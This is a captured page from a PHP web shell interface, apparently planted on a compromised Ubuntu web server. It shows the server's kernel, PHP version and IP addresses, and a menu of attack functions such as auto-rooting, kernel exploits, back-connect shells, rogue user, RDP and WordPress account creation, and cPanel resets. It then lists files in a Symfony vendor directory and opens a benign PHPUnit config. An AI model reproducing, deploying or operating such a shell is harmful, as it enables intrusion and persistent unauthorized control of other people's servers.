Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
vendor /
symfony /
process /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxr-xr-x
Pipes
[ DIR ]
drwxr-xr-x
Tests
[ DIR ]
drwxr-xr-x
.gitignore
34
B
-rw-r--r--
CHANGELOG.md
3.21
KB
-rw-r--r--
ExecutableFinder.php
2.51
KB
-rw-------
InputStream.php
2.21
KB
-rw-------
LICENSE
1.04
KB
-rw-r--r--
PhpExecutableFinder.php
2.58
KB
-rw-------
PhpProcess.php
2.45
KB
-rw-------
Process.php
51.13
KB
-rw-------
ProcessUtils.php
1.82
KB
-rw-------
README.md
477
B
-rw-r--r--
composer.json
757
B
-rw-r--r--
phpunit.xml.dist
834
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml.dist
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/5.2/phpunit.xsd" backupGlobals="false" colors="true" bootstrap="vendor/autoload.php" failOnRisky="true" failOnWarning="true" > <php> <ini name="error_reporting" value="-1" /> </php> <testsuites> <testsuite name="Symfony Process Component Test Suite"> <directory>./Tests/</directory> </testsuite> </testsuites> <filter> <whitelist> <directory>./</directory> <exclude> <directory>./Tests</directory> <directory>./vendor</directory> </exclude> </whitelist> </filter> </phpunit>
Close